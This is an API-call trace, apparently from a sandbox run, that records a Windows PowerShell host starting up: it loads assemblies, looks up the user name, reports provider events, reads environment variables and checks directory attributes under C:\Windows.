	[0605.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.420] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0605.420] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0606.544] CoTaskMemFree (pv=0x1b786f60) 
	[0606.544] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0606.544] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0606.544] CoTaskMemFree (pv=0x1a4bb0) 
	[0606.545] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33e3f70*="Registry", lpRawData=0x33e3d00) returned 1
	[0607.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0607.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0607.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0607.435] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0607.435] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0607.436] CoTaskMemFree (pv=0x1b786f60) 
	[0607.436] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0607.436] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0607.436] CoTaskMemFree (pv=0x1a4bb0) 
	[0607.436] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33e9388*="Variable", lpRawData=0x33e9118) returned 1
	[0607.594] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0607.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.594] CoTaskMemFree (pv=0x20da70) 
	[0607.597] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0607.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.597] CoTaskMemFree (pv=0x20da70) 
	[0607.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0607.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0607.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0607.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0608.443] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0608.443] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0608.444] CoTaskMemFree (pv=0x1b786f60) 
	[0608.444] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0608.444] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0608.445] CoTaskMemFree (pv=0x1a4bb0) 
	[0608.445] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33fcfa0*="Certificate", lpRawData=0x33fcd30) returned 1
	[0609.721] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0609.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.721] CoTaskMemFree (pv=0x20da70) 
	[0609.725] GetLogicalDrives () returned 0x4
	[0609.725] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xad0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.725] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0609.726] CoTaskMemAlloc (cb=0x20e) returned 0x1ff2e0
	[0609.726] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1ff2e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0609.726] CoTaskMemFree (pv=0x1ff2e0) 
	[0609.728] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0609.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.728] CoTaskMemFree (pv=0x20da70) 
	[0609.728] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0609.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.728] CoTaskMemFree (pv=0x20da70) 
	[0609.748] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0609.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.748] CoTaskMemFree (pv=0x20da70) 
	[0609.749] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0609.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.749] CoTaskMemFree (pv=0x20da70) 
	[0609.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.750] SetErrorMode (uMode=0x1) returned 0x1
	[0609.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad0b0 | out: lpFileInformation=0xad0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0609.750] SetErrorMode (uMode=0x1) returned 0x1
	[0609.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.750] SetErrorMode (uMode=0x1) returned 0x1
	[0609.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad0b0 | out: lpFileInformation=0xad0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0609.751] SetErrorMode (uMode=0x1) returned 0x1
	[0609.751] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0609.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.751] CoTaskMemFree (pv=0x20da70) 
	[0609.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xacff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.755] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.755] SetErrorMode (uMode=0x1) returned 0x1
	[0609.755] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad070 | out: lpFileInformation=0xad070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.755] SetErrorMode (uMode=0x1) returned 0x1
	[0609.755] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.755] SetErrorMode (uMode=0x1) returned 0x1
	[0609.755] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad070 | out: lpFileInformation=0xad070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.756] SetErrorMode (uMode=0x1) returned 0x1
	[0609.756] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xace70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.756] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.756] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.756] SetErrorMode (uMode=0x1) returned 0x1
	[0609.756] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad070 | out: lpFileInformation=0xad070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0609.756] SetErrorMode (uMode=0x1) returned 0x1
	[0609.756] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.757] SetErrorMode (uMode=0x1) returned 0x1
	[0609.757] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad070 | out: lpFileInformation=0xad070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0609.757] SetErrorMode (uMode=0x1) returned 0x1
	[0609.757] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xace70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.757] SetErrorMode (uMode=0x1) returned 0x1
	[0609.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad070 | out: lpFileInformation=0xad070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0609.758] SetErrorMode (uMode=0x1) returned 0x1
	[0609.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.758] SetErrorMode (uMode=0x1) returned 0x1
	[0609.758] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad070 | out: lpFileInformation=0xad070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0609.758] SetErrorMode (uMode=0x1) returned 0x1
	[0609.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xace70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.759] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xacea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.759] SetErrorMode (uMode=0x1) returned 0x1
	[0609.759] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad0b0 | out: lpFileInformation=0xad0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0609.759] SetErrorMode (uMode=0x1) returned 0x1
	[0609.759] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xacea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.759] SetErrorMode (uMode=0x1) returned 0x1
	[0609.759] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad0b0 | out: lpFileInformation=0xad0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0609.759] SetErrorMode (uMode=0x1) returned 0x1
	[0609.760] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xacda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0609.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xacea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0609.760] SetErrorMode (uMode=0x1) returned 0x1
	[0610.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad0b0 | out: lpFileInformation=0xad0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0610.682] SetErrorMode (uMode=0x1) returned 0x1
	[0610.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xacea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0610.683] SetErrorMode (uMode=0x1) returned 0x1
	[0610.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad0b0 | out: lpFileInformation=0xad0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0610.683] SetErrorMode (uMode=0x1) returned 0x1
	[0610.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0610.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xacda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0610.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0610.685] SetErrorMode (uMode=0x1) returned 0x1
	[0610.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad370 | out: lpFileInformation=0xad370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0610.685] SetErrorMode (uMode=0x1) returned 0x1
	[0611.641] CoTaskMemAlloc (cb=0x804) returned 0x1b786f60
	[0611.641] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b786f60, nSize=0xad6d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad6d8) returned 0x1
	[0611.642] CoTaskMemFree (pv=0x1b786f60) 
	[0611.642] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0611.642] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad718 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad718) returned 1
	[0611.642] CoTaskMemFree (pv=0x1a4bb0) 
	[0611.644] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3435c88*="Available", lpRawData=0x3435a18) returned 1
	[0611.650] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0611.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.650] CoTaskMemFree (pv=0x20da70) 
	[0611.651] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0611.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.651] CoTaskMemFree (pv=0x20da70) 
	[0611.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.658] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0611.659] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0611.659] CoTaskMemFree (pv=0x20da70) 
	[0611.659] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0611.659] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0611.659] CoTaskMemFree (pv=0x20da70) 
	[0611.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
